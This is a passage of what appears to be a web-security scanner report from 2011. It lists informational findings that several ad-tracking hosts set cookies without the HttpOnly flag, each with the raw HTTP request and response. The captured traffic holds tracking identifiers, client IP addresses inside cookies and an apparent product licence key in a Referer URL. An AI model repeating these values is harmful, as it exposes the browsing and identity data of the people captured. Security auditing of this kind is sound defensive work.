$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!$=(6NF!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!,=(6V[!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!$=(6NF!$#X4!!!!#=#%VO!$#yu!!!!,=(6NF!$$I]!!!!#=(6NF!$$Ig!!!!#=(6NF!$$Il!!!!#=(6NF!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!(=(6NF!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$2?y!!!!#=(6?g!$35v!!!!#=(BU="; path=/; expires=Sun, 23-Jun-2013 13:32:19 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Fri, 24 Jun 2011 13:32:19 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;
13.26. http://ads.lucidmedia.com/clicksense/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.lucidmedia.com
Path:   /clicksense/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/pixel?id=103769&t=i HTTP/1.1
Host: ads.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=304YId6UCEb

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Sat, 25 Jun 2011 02:11:01 GMT
Expires: Sat, 25 Jun 2011 02:11:01 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=304YId6UCEb; Domain=.lucidmedia.com; Expires=Sun, 24-Jun-2012 02:11:01 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1307844&t=2
Content-Length: 0
Connection: close

13.27. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1191843D63220110119210146&cid=1434549&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b30/3/0/*/g%3B237850365%3B0-0%3B2%3B58756654%3B4307-300/250%3B40455509/40473296/1%3B%3B~aopt=2/1/6d/1%3B~sscs=%3F$CTURL$&time=5|8:26|-5&r=0.18809315958060324&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8707574490954974&output=html&h=250&slotname=0966043985&w=300&lmt=1308940014&flash=10.3.181&url=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&dt=1308922014502&bpp=3&shv=r20110615&jsv=r20110616&prev_slotnames=7288386218&correlator=1308922009816&frm=4&adk=3718087554&ga_vid=1055506945.1308922001&ga_sid=1308922001&ga_hid=1023183180&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&eid=33895143&fu=0&ifi=2&dtd=19&xpc=95bno1LOUQ&p=http%3A//www.gamersdailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CEJozEpiencOrSADIBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDe; PRgo=BBBAAuILBBVCFUE6; PRimp=28A60400-6EA1-2C4A-0209-D6A000040100; PRca=|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 24 Jun 2011 13:31:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 14924
Set-Cookie:PRvt=CEJozEpiencOrSADIBBeJwvEpZYTFEeMAI_BAeJdXEpiZ_xsvXAAhBDeJWuEpnU4MzRwAAFBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAuILBBVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=75A60400-3338-7034-0309-5AE000050101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJyC*1646:2|AK3y*423:7|AKEt*6961:1|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:3|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:29|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJyCAA08:2|AK3yAAGp:7|AKQhAAGY:1|AKEtABoR:1|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:3|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:23|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FADR:2|FaVQ:7|FYoG:1|FX38:2|FP53:1|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:11|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GBLt:2|GQI7:7|GMER:1|GLnv:2|GKRx:1|GME7:1|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FADRGBLt:2|FaVQGQI7:7|FYoGGMER:1|FX38GLnv:2|FP53GKRx:1|FYnmGME7:1|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
13.28. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1308922027.341,wait-%3E10000,&1308922029900 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:32:07 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1308922027%2E341%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
13.29. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=176708751&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Farticle.wn.com%252Fview%252F2011%252F02%252F08%252FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%252F%26jsref%3D%26rnd%3D1308922054552&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Farticle.wn.com%2Fview%2F2011%2F02%2F08%2FSpil_Games_Selects_Adyens_Internet_Payment_System_for_Global%2F&jsref=&rnd=1308922054552
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:27:33 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:27:33 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.30. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035165&d.c=gif&d.o=eapogocom&d.x=208147318&d.t=page&d.u=http%3A%2F%2Fwww.pogo.com%2Fpogo-online-games%2Flp-GeneralPogo-withoutFB.jsp%3Fsourceid%3Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%26ad%3D6429295350%26kw%3Dfree%2Binternet%2Bgames%26sitetarget%3D&d.r=http%3A%2F%2Fwww.pogo.com%2Flogin%2Fentry.jsp%3Fsl%3D1%26site%3Dpogo%26redr%3Dhttp%253A%252F%252Fwww.pogo.com%252Fpogo-online-games%252Flp-GeneralPogo-withoutFB.jsp%253Fad%253D6429295350%2526sourceid%253Dfree_internet_games_Broad_Free_GOO_C0080_A0001_LP0001%2526kw%253Dfree%252Binternet%252Bgames%2526site HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp?sourceid=free_internet_games_Broad_Free_GOO_C0080_A0001_LP0001&ad=6429295350&kw=free+internet+games&sitetarget=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:30:36 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Sun, 23-Jun-2013 13:30:36 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
13.31. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=242390407&c4=206438376&c5=1&c6=14&c7=tue%20may%2017%2020%3A12%3A51%202011&c8=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&c9=GDN%3A%2040%25%20of%20Internet%20Users%20Play%20Casual%20Games%20Says%20Spil&c10=&c15=&1308922008562 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; UID=4a757a7-24.143.206.42-1305663172; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:30:59 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Sun, 23-Jun-2013 13:30:59 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.32. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=537085&ev=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; V=8vciuQJMXXJY; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 17:04:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; Domain=.contextweb.com; Expires=Sat, 23-Jun-2012 17:04:27 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 17:04:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
13.33. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=357&token=EHEX1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 13:31:14 GMT; Path=/
Set-Cookie: cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2; Domain=.contextweb.com; Expires=Sat, 28-May-2016 13:31:14 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
